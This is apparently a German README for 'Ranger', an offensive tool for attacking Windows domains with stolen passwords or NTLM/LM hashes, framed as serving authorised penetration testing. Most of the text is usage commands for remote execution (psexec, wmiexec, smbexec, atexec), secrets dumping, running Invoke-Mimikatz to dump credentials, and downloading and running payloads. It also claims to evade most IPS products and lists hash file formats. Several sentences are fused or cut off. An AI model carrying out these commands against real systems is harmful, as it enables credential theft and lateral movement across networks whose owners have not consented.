
Ein Tool für Sicherheitsexperten, um auf entfernte Microsoft Windows-basierte Systeme zuzugreifen und mit ihnen zu interagieren.
Ein Werkzeug zur Unterstützung von Sicherheitsexperten beim Zugriff auf und der Interaktion mit entfernten Microsoft Windows-basierten Systemen.
Dieses Projekt wurde mit dem Gedanken konzipiert, dass wir weder den Bogen noch den Pfeil erfunden haben, sondern nur eine effizientere Art der Nutzung.
Ranger ist ein kommandozeilenbasiertes Angriffs- und Penetrationstest-Werkzeug, das die Fähigkeit besitzt, einen instantiierten Katapult-Server zu verwenden, um Fähigkeiten gegen Windows-Systeme auszuliefern. Solange ein Benutzer einen Satz von Anmeldeinformationen oder einen Hash-Satz (NTLM, LM, LM:NTLM) besitzt, kann er auf Systeme zugreifen, die Teil der Vertrauensstellung sind.
Mit dieser Fähigkeit kann ein Sicherheitsexperte Anmeldeinformationen im Klartext aus dem Speicher extrahieren, auf SAM-Tabellen zugreifen, Befehle ausführen, PowerShell-Skripte, Windows-Binärdateien und andere Werkzeuge ausführen. Derzeit umgeht das Werkzeug die Mehrheit der IPS-Herstellerlösungen, es sei denn, sie wurden speziell darauf abgestimmt, es zu erkennen. Das Werkzeug wurde in unseren Heimlaboren entwickelt, um Sicherheitsexperten bei rechtlich und/oder vertraglich unterstützten Aktivitäten zu unterstützen.
Weitere Funktionen werden hinzugefügt, aber derzeit nutzt das Werkzeug die Community-Beiträge aus Repositorys der Teams PowerView, PowerShell Mimikatz und Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership bestimmen.--domain, mit der Sie eine andere Domäne als die, bei der Sie angemeldet sind, anvisieren können.ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d angeben, wird davon ausgegangen, dass Sie alle Domänennamen in der Datei ignorieren möchten.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml